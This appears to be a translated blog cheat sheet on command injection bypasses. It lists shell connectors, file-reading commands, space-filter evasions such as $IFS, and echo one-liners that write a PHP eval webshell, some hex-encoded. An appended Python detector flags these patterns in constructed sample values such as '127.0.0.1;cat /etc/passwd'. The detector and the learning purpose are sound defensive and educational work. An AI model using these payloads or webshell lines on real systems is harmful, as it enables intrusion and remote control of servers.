RCE: simple command injection attacks

Simple RCE summary

First: command injection is an attack caused by a web application not strictly checking the data a user submits before it is passed to a system command. Like SQL injection, it can cause great harm. (From a security beginner's summary.)

Summary of some bypass techniques

  1. Command connectors

    1. `;`: finishes executing the preceding statement, then executes the following one.
    2. `|`: shows only the result of the following statement.
    3. `||`: if the preceding statement fails, the following statement is executed.
    4. `&`: both commands are executed; the following statement runs even if the preceding one fails, so the preceding statement may be either true or false.
    5. `&&`: if the preceding statement fails, execution stops and the following statement is not run; if it succeeds, both commands run, so the preceding statement must be true.
    6. `%0a`: the URL encoding of a newline; it cannot be used directly on Linux and needs the PHP environment (something to think of once the previous ones have been filtered).
  2. Commands for viewing file contents

    1. `cat` displays from the first line and outputs the whole content.
    2. `tac` is the opposite of `cat`: it outputs line by line starting from the last line.
    3. `more` is the commonly used pager, usually fed through a pipe.
    4. `head` displays the first few lines of a text file.
    5. `tail` displays the last lines.
    6. `nl` works like `cat -n`: the output shows line numbers together with the contents.
  3. Writing a webshell from the command line

    1. Linux: `echo "<?php eval(@\$_POST['pass']);?>" > webshell.php`
    2. `echo 3c3f7068706576616c2840245f504f53545b2270617373225d293b3f3e | xxd -r -ps > webshell.php` // same idea as the one above: the payload is converted to hexadecimal, and `xxd -r` turns the hex back into text
    3. Windows: `echo ^<?php eval($_POST[pass]); ?^> > webshell.php`
  4. Tricks for when spaces are filtered

    1. `{ls,-a}`
    2. `<`: `ls<-a`
    3. `$IFS`: borrowing another blogger's explanation: on Linux, IFS is the field separator, but with a plain `cat$IFS2` the bash interpreter treats the whole `IFS2` as the variable name, so no result is output. Wrapping the name in braces, `${IFS}`, fixes the variable name; likewise, appending `$9` after `$IFS` has the same truncating effect. Why `$9`? Because `$9` only holds the ninth parameter of the current shell process, which is always an empty string.
    4. Environment variables: `shell=$'\x20123'`; `\x20` is a space. ... (find `flag*`)
  5. **When most operations are filtered**

    1. `$@` can be used, e.g. `ca$@t flag`
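As an added example (not part of the original post), here is a small Python checker that flags the tricks listed in the summary above in a single request parameter, the kind of check a defender would run over access logs or in a WAF-style filter: it URL-decodes repeatedly (so `%0a` and double-encoded `%250a` both become a newline, which is mapped to `;`), then reports which connector or space-bypass pattern appears. The sample parameter values are constructed.

```python
import re
from urllib.parse import unquote

# Each pattern corresponds to one of the tricks listed in the summary above.
PATTERNS = [
    (r"[;|&]", "command connector (;, |, ||, &, &&, or a %0a newline)"),
    (r"\$\{?IFS\}?", "$IFS / ${IFS} used in place of a space"),
    (r"\$[0-9@*]", "empty parameter such as $9 or $@ splitting a word"),
    (r"\{[^}\s]*,[^}\s]*\}", "brace expansion such as {ls,-a}"),
    (r"<\S", "input redirect used instead of a space (ls<-a)"),
    (r"\$'\\x[0-9a-fA-F]{2}", "ANSI-C quoted hex escape such as $'\\x20'"),
    (r">\s*\S+\.php\b", "output redirected into a .php file"),
    (r"\b(cat|tac|more|head|tail|nl|xxd)\b", "file-reading or decoding command"),
]

def normalize(value: str) -> str:
    """URL-decode until stable (catches %250a double encoding) and map newlines to ';'."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value.replace("\r", ";").replace("\n", ";")

def classify(value: str) -> list[str]:
    """Return the description of every suspicious pattern found in one parameter value."""
    text = normalize(value)
    return [label for pattern, label in PATTERNS if re.search(pattern, text)]

# Constructed sample values of a 'host' parameter handed to a ping-style command.
SAMPLE_VALUES = [
    "127.0.0.1",
    "127.0.0.1;cat%20/etc/passwd",
    "127.0.0.1%0a{ls,-a}",
    "127.0.0.1|ca$@t${IFS}$9flag",
    "127.0.0.1%26%26echo%20x%20>%20webshell.php",
]

if __name__ == "__main__":
    for value in SAMPLE_VALUES:
        print(f"{value!r:45} -> {classify(value) or ['clean']}")
```

Only the first sample value comes back clean; every other one is reported under the specific trick it uses, which is what makes the output useful when triaging which filter was bypassed.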

Source: blog.csdn.net/weixin_44611282/article/details/104828283